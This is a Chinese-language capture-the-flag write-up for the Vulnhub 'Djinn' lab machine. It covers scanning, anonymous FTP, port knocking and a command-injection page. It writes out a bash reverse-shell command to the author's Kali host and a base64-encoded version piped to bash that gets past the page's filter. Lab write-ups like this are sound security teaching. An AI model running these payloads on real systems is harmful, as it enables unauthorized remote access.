Vulnhub-Djinn靶机-Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址：

https://www.vulnhub.com/entry/djinn-1,397/

靶机知识点：

arp-scan
nmap
ftp
nc
dirsearch
命令执行
python2 input漏洞

主机发现

靶机是ova格式的，可以用Vmware导入，也可以用virtualbox打开。
使用命令：扫描存活ip。
arp-scan 192.168.34.0/24

根据虚拟机的mac地址可以找到对应的ip。
这里我靶机的ip是192.168.34.152

信息收集与利用

端口发现

妥妥的第一步先看看开了啥端口。我使用的命令是
nmap -sV -p 0-65535 192.168.34.152

开了四个端口：21 22 1337 7331。

看见21端口就想到了不用密码也能登陆的匿名用户，试试

game.txt

game.txt写着1337端口有一个游戏

message.txt

creds.txt

访问1337端口的游戏

这是什么玩意，运行1000次才能给我一个gift，自己写个脚本跑游戏，得到信息。

这个gift…有点特别。第一眼就知道是敲门(端口敲门服务，knockd)

端口敲门服务，即：knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列序列号来“敲门”，使系统开启需要访问的服务端口，才能对外访问。不使用时，再使用自定义的序列号来“关门”，将端口关闭，不对外监听。进一步提升了服务和系统的安全性。

kali安装knockd ： apt-get install knockd
开始敲门:

knock 192.168.34.152 1356 6784 3409

这里提一下。上面nmap扫出来的端口,ssh的状态应该是filter，只要连接就拒绝。为什么是open？因为我之前已经敲过门了。这个敲门就是把ssh敲开了。变成open状态
但是没有账号和密码，这里也就不了而了了。

目录发现

看见7331端口。是个python2.7搭的web服务。访问这个7331端口

看见这个页面就想爆破目录。

看见目录有wish和genie
访问genie,无果

访问wish

看这意思好像是命令执行，输入id提交，跳转到genie页面，查看页面源码

成功执行了命令。
我们想反弹一个shell
bash -i >& /dev/tcp/192.168.34.80/6666 0>&1。192.168.34.80是我kali的ip。
页面提示Wrong choice of words。

过滤了一些字符，就知道也没有那么简单。经测试，过滤了如下字符

绕过就ok。使用base64绕过然后再解出来传给bash。
base64加密网站https://www.base64encode.org/ 。这个网站不会先进行url编码
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM0LjgwLzY2NjYgMD4mMQ== | base64 -d | bash

成功给kali反弹了shell。